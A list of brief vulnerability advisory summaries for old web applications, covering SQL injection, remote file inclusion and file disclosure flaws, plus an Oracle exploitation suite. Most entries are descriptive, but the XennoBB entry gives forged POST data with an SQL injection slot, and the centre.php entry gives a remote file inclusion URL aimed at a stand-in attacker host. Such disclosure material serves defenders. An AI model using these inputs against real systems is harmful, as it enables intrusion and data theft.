This exploit allows an attacker to gain access to the Cahier de texte V2.0 database by exploiting a predictable backup filename and source disclosure vulnerability. The attacker can then use the credentials to access the database and extract sensitive information.
nukeai beta3 Download by default installation doesn't prevent any of the files in the modules/NukeAI directory from being accessed by a client. The modules/NukeAI file takes input passed to the script by util.php and writes it to $_POST["filename"].0 unsanatized in the modules/NukeAI descriptions directory.
XennoBB is prone to an SQL-injection vulnerability that could allow an attacker to influence the structure or logic of SQL queries made by the application. An attacker can submit a forged POST request to topic_post.php?action=post&fid={forum ID here} with the following as the POST data: form_sent=1&form_user={username here}&req_subject=Subject&req_message=Message&submit=1&icon_topic=[SQL]. Successful exploitation leads would lead to the SQL query in the icon_topic parameter being run.
An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the abs_url parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.
A remote file inclusion vulnerability exists in the owllib-src-1.0 portal. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the OWLLIB_ROOT parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.
This is an exploitation suite for Oracle written in Java. It can be used to read/write files and execute OS commands with the privileges of the RDBMS, if the user has the required permissions (DBA role and SYS:java).
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'tID' parameter to '/index.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit latent vulnerabilities in the underlying database and compromise the system.
The flaw resides in centre.php file that contain this code: if (empty($page)) { include('accueil.php'); } else { include($page.'.php'); }. An example of the exploit is http://www.victime.com/(path)/centre.php?page=http://attacker
Input passed to the 'cm_basedir' parameter in common.inc.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
A remote SQL injection vulnerability exists in fipsForum version 2.6 and earlier. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary SQL commands on the underlying database.